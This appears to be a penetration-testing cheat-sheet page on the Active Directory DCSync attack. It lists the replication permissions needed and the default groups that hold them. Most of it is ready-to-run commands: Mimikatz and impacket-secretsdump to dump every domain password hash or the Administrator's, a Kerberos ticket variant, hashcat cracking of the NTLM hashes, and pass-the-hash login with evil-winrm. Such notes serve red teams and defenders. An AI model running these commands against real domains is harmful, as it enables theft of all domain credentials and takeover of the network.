πΎ Overview
The DCSync permission in AD allows a user to emulate a DC to dump all password hashes from the domain controller. This attack exploits the replication functionality between domains controllers, which canβt be disabled.
π Discovery
Required permissions:
- DS-Replication-Get-Changes
- Replicating Directory Changes All
- Replicating Directory Changes In Filtered Set
Default groups with these permissions:
- Domain Admins
- Enterprise Admins
- Administrators
- Domain Controllers
π Exploitation
Local
# Using PowerSploit on a specific user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:[USERNAME]"'
# Using mimikatz
lsadump::dcsync /user:[USERNAME]Remote
# Using impacket to dump all hashes
impacket-secretsdump -just-dc '[user]:[pass]@[ip]' -outputfile dcsync.hash
# Using impacket to get the user of just the Administrator
impacket-secretsdump -just-dc '[user]:[pass]@[ip]' -outputfile dcsync.hash -just-dc-user Administrator
# Using impacket & Kerberos authentication (Pass the Ticket)
impacket-secretsdump -k -nopass -just-dc -outputfile dcsync.hash⨠Post-Exploitation
Once NTLM hashes are obtained, they can either be used in a pass the hash attack, or cracked offline.
# Simple dictionary attack
hashcat -a 0 -m 1000 dcsync.hash [wordlist]
# PTH with Evil-WinRM
evil-winrm -i [IP] -u [USERNAME] -H [LM HASH]π Resources
| π Hyperlink | βΉοΈ Info |
|---|---|
| PowerSploit | Contains Invoke-Mimikatz |
| Mimikatz | Versatile tool for pth, ptt, golden tickets, dcsync, pulling credentials, etc. |